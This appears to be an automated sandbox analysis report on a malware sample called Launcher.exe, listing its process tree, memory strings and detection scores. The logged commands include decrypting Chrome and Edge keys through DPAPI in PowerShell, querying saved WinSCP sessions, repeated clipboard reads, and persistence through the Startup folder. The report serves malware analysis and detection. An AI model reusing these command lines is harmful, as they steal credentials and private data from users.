        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011475D22_2_00007FFCA011475D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011676D22_2_00007FFCA011676D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011777B22_2_00007FFCA011777B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0107B5D22_2_00007FFCA0107B5D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0116BAD22_2_00007FFCA0116BAD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA01197ED22_2_00007FFCA01197ED
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011BBC822_2_00007FFCA011BBC8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA01157CD22_2_00007FFCA01157CD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0117FCD22_2_00007FFCA0117FCD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011C40D22_2_00007FFCA011C40D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011740D22_2_00007FFCA011740D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011CC1022_2_00007FFCA011CC10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010D45C22_2_00007FFCA010D45C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0118C5D22_2_00007FFCA0118C5D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011A45D22_2_00007FFCA011A45D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011543D22_2_00007FFCA011543D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010785D22_2_00007FFCA010785D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011505B22_2_00007FFCA011505B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA025EE2722_2_00007FFCA025EE27
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA03BD27D22_2_00007FFCA03BD27D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA03B60EB22_2_00007FFCA03B60EB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA03BD08922_2_00007FFCA03BD089
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA03B538522_2_00007FFCA03B5385
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA03B1E5622_2_00007FFCA03B1E56
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FC2EF6E26_2_00007FFC9FC2EF6E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FC2134826_2_00007FFC9FC21348
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FC2C65026_2_00007FFC9FC2C650
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FE88DFD26_2_00007FFC9FE88DFD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FE8712726_2_00007FFC9FE87127
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FE9010D26_2_00007FFC9FE9010D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA0001DD526_2_00007FFCA0001DD5
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF808B26_2_00007FFC9FFF808B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE58B926_2_00007FFC9FFE58B9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE90AD26_2_00007FFC9FFE90AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF88ED26_2_00007FFC9FFF88ED
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFA8FD26_2_00007FFC9FFFA8FD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF710D26_2_00007FFC9FFF710D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFA11E26_2_00007FFC9FFFA11E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF618B26_2_00007FFC9FFF618B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE018D26_2_00007FFC9FFE018D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFE1E826_2_00007FFC9FFFE1E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF821526_2_00007FFC9FFF8215
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF6A0C26_2_00007FFC9FFF6A0C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFBA0D26_2_00007FFC9FFFBA0D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE723126_2_00007FFC9FFE7231
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF0A5926_2_00007FFC9FFF0A59
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEBA5C26_2_00007FFC9FFEBA5C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF42AB26_2_00007FFC9FFF42AB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF92AD26_2_00007FFC9FFF92AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEF2AD26_2_00007FFC9FFEF2AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF8AC926_2_00007FFC9FFF8AC9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEA2BD26_2_00007FFC9FFEA2BD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEB2FC26_2_00007FFC9FFEB2FC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF3B5C26_2_00007FFC9FFF3B5C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFEB5D26_2_00007FFC9FFFEB5D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFD35C26_2_00007FFC9FFFD35C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF738B26_2_00007FFC9FFF738B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEDB8926_2_00007FFC9FFEDB89
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF43C426_2_00007FFC9FFF43C4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFCBBD26_2_00007FFC9FFFCBBD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFAC5D26_2_00007FFC9FFFAC5D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE1C7926_2_00007FFC9FFE1C79
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFC48B26_2_00007FFC9FFFC48B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF7C9B26_2_00007FFC9FFF7C9B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFF4A026_2_00007FFC9FFFF4A0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF74B426_2_00007FFC9FFF74B4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF651B26_2_00007FFC9FFF651B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE0D2926_2_00007FFC9FFE0D29
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFB53D26_2_00007FFC9FFFB53D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF5D5026_2_00007FFC9FFF5D50
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF8D4D26_2_00007FFC9FFF8D4D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF059826_2_00007FFC9FFF0598
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF7DB426_2_00007FFC9FFF7DB4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA00005EB26_2_00007FFCA00005EB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF6E0126_2_00007FFC9FFF6E01
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF65FE26_2_00007FFC9FFF65FE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF766B26_2_00007FFC9FFF766B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEFE7826_2_00007FFC9FFEFE78
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF467626_2_00007FFC9FFF4676
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFC68E26_2_00007FFC9FFFC68E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE26D926_2_00007FFC9FFE26D9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEC6E726_2_00007FFC9FFEC6E7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF672826_2_00007FFC9FFF6728
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA000074026_2_00007FFCA0000740
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF3F5C26_2_00007FFC9FFF3F5C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFB7BD26_2_00007FFC9FFFB7BD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFEFF026_2_00007FFC9FFFEFF0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFE00526_2_00007FFC9FFFE005
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFD85D26_2_00007FFC9FFFD85D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA0392DC926_2_00007FFCA0392DC9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA03969C126_2_00007FFCA03969C1
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.expl.winEXE@81/125@3/2
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkgJump to behavior
        Source: Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\Launcher.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
        Source: Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);PRAGMA %Q.page_sizedocid,%s(x.'c%d%q')langid, x.%Q, x.'%q'_content FROM '%q'.'%q%s' AS x,%s(?), ?SELECT * FROM %Q.%Qtokenizematchinfoprefixcompressuncompressordercontentlanguageidnotindexedfts3unrecognized matchinfo: %sascunrecognized order: %sunrecognized parameter: %ssimpleerror parsing prefix parameter: %smissing %s parameter in fts4 constructorDESCASCSELECT %s WHERE rowid = ?SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %sSELECT %s ORDER BY rowid %sfts3cursor%s_statillegal first argument to %s<b></b><b>...</b>wrong number of arguments to function snippet()snippetoffsetsIndex optimizedIndex already optimalALTER TABLE %Q.'%q_content' RENAME TO '%q_content';ALTER TABLE %Q.'%q_docsize' RENAME TO '%q_docsize';ALTER TABLE %Q.'%q_stat' RENAME TO '%q_stat';ALTER TABLE %Q.'%q_segments' RENAME TO '%q_segments';ALTER TABLE %Q.'%q_segdir' RENAME TO '%q_segdir';INSERT INTO %Q.%Q(%Q) VA
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
        Source: Launcher.exeReversingLabs: Detection: 34%
        Source: Launcher.exeVirustotal: Detection: 48%
        Source: C:\Users\user\Desktop\Launcher.exeFile read: C:\Users\user\Desktop\Launcher.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3D45.tmp" "c:\Users\user\AppData\Local\Temp\anq2mtqn\CSCF5995D8BF694D46AD6A4558D7F1AF.TMP"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
